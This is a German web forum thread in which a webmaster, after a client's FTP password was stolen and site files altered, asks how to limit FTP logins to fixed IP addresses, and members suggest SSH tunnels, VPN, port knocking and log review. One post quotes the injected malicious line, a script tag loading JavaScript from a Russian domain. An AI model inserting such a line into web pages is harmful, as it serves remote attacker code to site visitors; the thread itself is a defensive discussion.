Alt 30.07.2010, 13:24:46   #1 (permalink)
Simpsons Webmaster
Benutzerbild von MisterSimpson

ID: 50883
Lose-Remote

MisterSimpson eine Nachricht über ICQ schicken MisterSimpson eine Nachricht über AIM schicken MisterSimpson eine Nachricht über MSN schicken MisterSimpson eine Nachricht über Yahoo! schicken
Reg: 20.04.2006
Beiträge: 2.540
MisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz sein
Standard Feste IP für FTP Server

Hallo,

ich beziehe DSL über Alice und somit erhalte ich alle 24 Stunden eine neue IP sprich ich habe eine dynamische IP Adresse. In den meisten Fällen ist das ja so.

Nun gut zu meinem Problem. Vor kurzem gab es einen Angriff auf den FTP Server meines Kunden und die Idee ist jetzt den FTP Zugang nur für eine bestimmte IP freizugeben. Mein Kunde hat immer dieselbe IP Adresse, aber bei mir ist das ein Problem. Jetzt habe ich schon an dyndns gedacht, aber kann man im Server eine dyndns hinterlegen, dass diese auf den FTP zugreifen darf, aber wiederrum wie soll ich das in meinem FileZilla einstellen?

Wie könnte ich dieses Problem lösen? Was mir gerade einfällt evtl. ein Proxy, aber gibt es da was kostenloses und ist das ein Programm was ich anmache und dann habe ich die Proxy Adresse?
MisterSimpson ist offline   Mit Zitat antworten
Gesponsorte Links
Alt 30.07.2010, 13:36:43   #2 (permalink)
return void
Benutzerbild von ice-breaker

ID: 93995
Lose-Remote

ice-breaker eine Nachricht über ICQ schicken
Reg: 27.04.2006
Beiträge: 6.026
ice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehen
Standard

SSH-Tunnel? OpenVPN?

Dem FTP-Server eine DynDNS-URL beizubringen wird wahrscheinlich schwer wie bis nicht möglich sein.


"Die Wahrheit entgeht dem, der nicht mit beiden Augen sieht." -Orici
ice-breaker ist offline   Mit Zitat antworten
Alt 30.07.2010, 16:16:19   #3 (permalink)
Erfahrener Benutzer

Reg: 14.10.2007
Beiträge: 666
papslf58 papslf58 papslf58
Standard Feste IP

Hallo

Ich wüßte nicht was an deinem Vorhaben besser wäre?

Ich halte eine feste IP für eine höhrees Risiko, als eine sich dauernd ändernde IP.

Die IP ist doch nicht das Sicherheitsproblem, oder doch ?

Wie erfolgte denn der Angriff? via ssh
papslf58 ist offline   Mit Zitat antworten
Alt 30.07.2010, 16:19:00   #4 (permalink)
Nerds2²ever
Benutzerbild von No5251

ID: 8850
Lose-Remote

No5251 eine Nachricht über ICQ schicken
Reg: 01.06.2006
Beiträge: 1.558
No5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende ZukunftNo5251 hat eine strahlende Zukunft
Standard

Definiere "Angriff"? Welcher FTP-Server und ist etwas passiert?

Und du könntest das ganze auch über Port Knocking lösen.
greetz
</no5251>


No5251 ist offline   Mit Zitat antworten
Alt 31.07.2010, 09:22:08   #5 (permalink)
King with a crown
Benutzerbild von DelphiKing

ID: 46719
Lose-Remote

DelphiKing eine Nachricht über ICQ schicken
Reg: 20.04.2006
Beiträge: 6.271
DelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes AnsehenDelphiKing genießt hohes Ansehen
Standard

Zitat:
Zitat von papslf58 Beitrag anzeigen
Wie erfolgte denn der Angriff? via ssh
Angriff auf den FTP-Dienst via SSH? Dann wäre es doch eher ein Angriff auf den SSH-Dienst?

Und @No5251: Wieso ist es unsicherer, wenn man von vorne herein alle Verbindungen, die nicht von 2 bestimmten IPs kommen, rausfiltert? Natürlich sollten sich die anderen beiden IPs dann trotzdem noch authentifizieren müssen… aber es hält zumindest schonmal fast alle Angreifer davon ab, es überhaupt erst zu probieren.

Aber mit DynDNS wird das wohl wirklich übertrieben kompliziert und nur mittelmäßig sicher… wie schon erwähnt wurde: Es gibt bessere und sicherere Möglichkeiten.
DelphiKing ist offline   Mit Zitat antworten
Alt 31.07.2010, 10:14:44   #6 (permalink)
Simpsons Webmaster
Benutzerbild von MisterSimpson

ID: 50883
Lose-Remote

MisterSimpson eine Nachricht über ICQ schicken MisterSimpson eine Nachricht über AIM schicken MisterSimpson eine Nachricht über MSN schicken MisterSimpson eine Nachricht über Yahoo! schicken
Reg: 20.04.2006
Beiträge: 2.540
MisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz sein
Standard

Ja man kam also an das FTP Passwort dran und somit wurde durch ein Script / Bot mehrere Dateien modifiziert und wieder hochgeladen. Waren zwei Zeilen mit einer russischen Domain und JavaScript.

Die Idee ist das nur die und die IP Adresse auf den FTP Server sich einloggen kann und keine andere IP Adresse mehr.
MisterSimpson ist offline Threadstarter   Mit Zitat antworten
Alt 31.07.2010, 10:36:08   #7 (permalink)
ohne Vertrauen
Benutzerbild von Bububoomt

ID: 10361
Lose-Remote
Abwesend

Bububoomt eine Nachricht über ICQ schicken
Reg: 28.04.2006
Beiträge: 15.363
Bububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes AnsehenBububoomt genießt hohes Ansehen
Standard

kommt mir bekannt vor, lass mich raten, das waren html,js oder php dateien die geändert wurden?

Hast du nicht vielelicht nen Zugriff auf nen anderen Server mit fester IP? So das du über den gehen kannst?
.DE 1. Jahr 3,95€, 2.Jahr oder Tranfer nur 2,95€! +2 Backlinks je Domain! ab 20 Domains+3 BL/Domain, ab 50 Domains+4BL/Domain!
Angebot mit Backlink (Preise sind dauerhaft gültig!) bis 31.5.2012!! Weitere Preise auf Anfrage
-> PN an Mich
Screenshot machen MammutHaNull Gold verkaufen
Bububoomt ist offline   Mit Zitat antworten
Alt 31.07.2010, 10:47:49   #8 (permalink)
Simpsons Webmaster
Benutzerbild von MisterSimpson

ID: 50883
Lose-Remote

MisterSimpson eine Nachricht über ICQ schicken MisterSimpson eine Nachricht über AIM schicken MisterSimpson eine Nachricht über MSN schicken MisterSimpson eine Nachricht über Yahoo! schicken
Reg: 20.04.2006
Beiträge: 2.540
MisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz sein
Standard

Richtig Bububoomt

Habe keinen anderen Server wenn Webspace, aber das nützt mir ja nichts.
MisterSimpson ist offline Threadstarter   Mit Zitat antworten
Alt 31.07.2010, 17:48:11   #9 (permalink)
kanz pöhse
Benutzerbild von LasMiranda

ID: 28058
Lose-Remote

LasMiranda eine Nachricht über ICQ schicken LasMiranda eine Nachricht über AIM schicken LasMiranda eine Nachricht über MSN schicken LasMiranda eine Nachricht über Yahoo! schicken LasMiranda eine Nachricht über Skype™ schicken
Reg: 05.05.2006
Beiträge: 2.897
LasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes Ansehen
Standard

Der "Einbruch" klingt zwar eher nach XSS und/oder CHMOD 777, aber na gut.
Gruß, Martin
Losekredite/-anleihen: 0,7%-0,9%/Tag

Deppenapostroph? CD's, DVD's, Mehrzahl und Genitiv ohne Apostroph
Deppenleerzeichen? Service Gebühr, Lose Seite, ... zusammenhängende Worte auch zusammenschreiben, also Loseseite, Servicegebühr oder mit - trennen
totaler Schrott? AGB's - Grund: laut Duden ist AGB schon die Mehrzahl + Deppenapostroph

Geändert von LasMiranda (31.07.2010 um 17:54:51 Uhr)
LasMiranda ist offline   Mit Zitat antworten
Alt 31.07.2010, 17:50:18   #10 (permalink)
return void
Benutzerbild von ice-breaker

ID: 93995
Lose-Remote

ice-breaker eine Nachricht über ICQ schicken
Reg: 27.04.2006
Beiträge: 6.026
ice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehenice-breaker genießt hohes Ansehen
Standard

Zitat:
Zitat von LasMiranda Beitrag anzeigen
XSS und CHMOD 777
das soll nen oder sein? Weil mir wäre kein kombinierter XSS und CHMOD 777 Angriff bekannt, beide sind ja für sich alleine schon ausreichend.


"Die Wahrheit entgeht dem, der nicht mit beiden Augen sieht." -Orici
ice-breaker ist offline   Mit Zitat antworten
Alt 31.07.2010, 23:22:12   #11 (permalink)
Simpsons Webmaster
Benutzerbild von MisterSimpson

ID: 50883
Lose-Remote

MisterSimpson eine Nachricht über ICQ schicken MisterSimpson eine Nachricht über AIM schicken MisterSimpson eine Nachricht über MSN schicken MisterSimpson eine Nachricht über Yahoo! schicken
Reg: 20.04.2006
Beiträge: 2.540
MisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz sein
Standard

Hoffe ich darf das posten. Also in den Dateien war dieser code reingeschrieben worden:

Code:
1:
2:
<script type="text/javascript" src="http://pantscow.ru:8080/Keywords.js"></script> <!--39e7d09ab7556ab9e8f6050b12321360-->
MisterSimpson ist offline Threadstarter   Mit Zitat antworten
Alt 31.07.2010, 23:34:36   #12 (permalink)
kanz pöhse
Benutzerbild von LasMiranda

ID: 28058
Lose-Remote

LasMiranda eine Nachricht über ICQ schicken LasMiranda eine Nachricht über AIM schicken LasMiranda eine Nachricht über MSN schicken LasMiranda eine Nachricht über Yahoo! schicken LasMiranda eine Nachricht über Skype™ schicken
Reg: 05.05.2006
Beiträge: 2.897
LasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes AnsehenLasMiranda genießt hohes Ansehen
Standard

Zitat:
Zitat von MisterSimpson Beitrag anzeigen
...Also in den Dateien war dieser code reingeschrieben worden:...
Aber was sagt das aus, wie der Angriff erfolgte? Nichts.
Gruß, Martin
Losekredite/-anleihen: 0,7%-0,9%/Tag

Deppenapostroph? CD's, DVD's, Mehrzahl und Genitiv ohne Apostroph
Deppenleerzeichen? Service Gebühr, Lose Seite, ... zusammenhängende Worte auch zusammenschreiben, also Loseseite, Servicegebühr oder mit - trennen
totaler Schrott? AGB's - Grund: laut Duden ist AGB schon die Mehrzahl + Deppenapostroph
LasMiranda ist offline   Mit Zitat antworten
Alt 01.08.2010, 01:16:12   #13 (permalink)
Erfahrener Benutzer
Benutzerbild von tyygoor

ID: 330197
Lose-Remote

tyygoor eine Nachricht über ICQ schicken tyygoor eine Nachricht über MSN schicken
Reg: 29.09.2008
Beiträge: 1.012
tyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehentyygoor genießt hohes Ansehen
Standard

Hallo,

also einen ftp User eine fest Ip zuzuordner halte ich für bedenklich, da er ja so an eine/seine Leitung gebunden ist. Viel wichtiger ist da herauszubekommen:

Wie kam der Bösewicht ins ftp? = leichtes PW? kein Schutz vor Brute-Force-Suche (engl. „brute force search“) etc etc? Sicher das nur ftp betroffen ist? War es ein unsicheres Script vom "Kunden" ?

dazu kommt,

Logdateien prüfen etc etc ....

gruss zur Nacht
tyygoor ist offline   Mit Zitat antworten
Alt 01.08.2010, 15:21:54   #14 (permalink)
Ein Neuer :)
Benutzerbild von IceTigers

ID: 392265
Lose-Remote

Reg: 03.03.2010
Beiträge: 112
IceTigers ist ein sehr geschätzter MenschIceTigers ist ein sehr geschätzter MenschIceTigers ist ein sehr geschätzter Mensch
Standard

Naja auch wenn du keine feste IP hast sind normalerweise die ersten 4 Zahlen immer gleich also z.B. 92.43.**.***
Sollte als Schutz eigentlich auch schon ausreichen nur die IP des Kunden und alle IPs mit z.B. 92.43.**.*** zuzulassen
*leer*
IceTigers ist offline   Mit Zitat antworten
Alt 02.08.2010, 10:34:48   #15 (permalink)
Simpsons Webmaster
Benutzerbild von MisterSimpson

ID: 50883
Lose-Remote

MisterSimpson eine Nachricht über ICQ schicken MisterSimpson eine Nachricht über AIM schicken MisterSimpson eine Nachricht über MSN schicken MisterSimpson eine Nachricht über Yahoo! schicken
Reg: 20.04.2006
Beiträge: 2.540
MisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz seinMisterSimpson kann auf vieles stolz sein
Standard

Welche Möglichkeiten gibt es um sich sicher in einen FTP einzuloggen. Also bei meinem Provider könnte ich eine feste IP beantragen, aber eine feste IP hat ja nicht nur Vorteile. Welche Möglichkeit gibt es also sonst noch eine sichere FTP Verbindung aufzubauen bzw. den Kreis die sich einloggen können zu verengen?
MisterSimpson ist offline Threadstarter   Mit Zitat antworten
Antwort

Gesponsorte Links

Anzeige


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 
Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind an
Pingbacks sind an
Refbacks sind an


Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
TS2 Server auf V-Server aufsetzen [ 1Mio Lose ] Schlotti1989 Lose4Scripts (erledigt) 4 24.08.2008 07:03:19
Dateien von Server auf Server laden - möglich? was wird benötigt? Slemens Webhosting 7 14.11.2007 14:31:45
(S) feste Buttonplätze und feste Voll-Bannerplätze Seidon Lose4Werbung (erledigt) 25 21.02.2007 19:54:24
[PHP/Server] Script ohne Einschränkungen ausführen um änderungen am Server vorzunehme flaschenkind Programmierung 2 07.01.2007 11:47:28


Alle Zeitangaben in WEZ +1. Es ist jetzt 01:27:16 Uhr.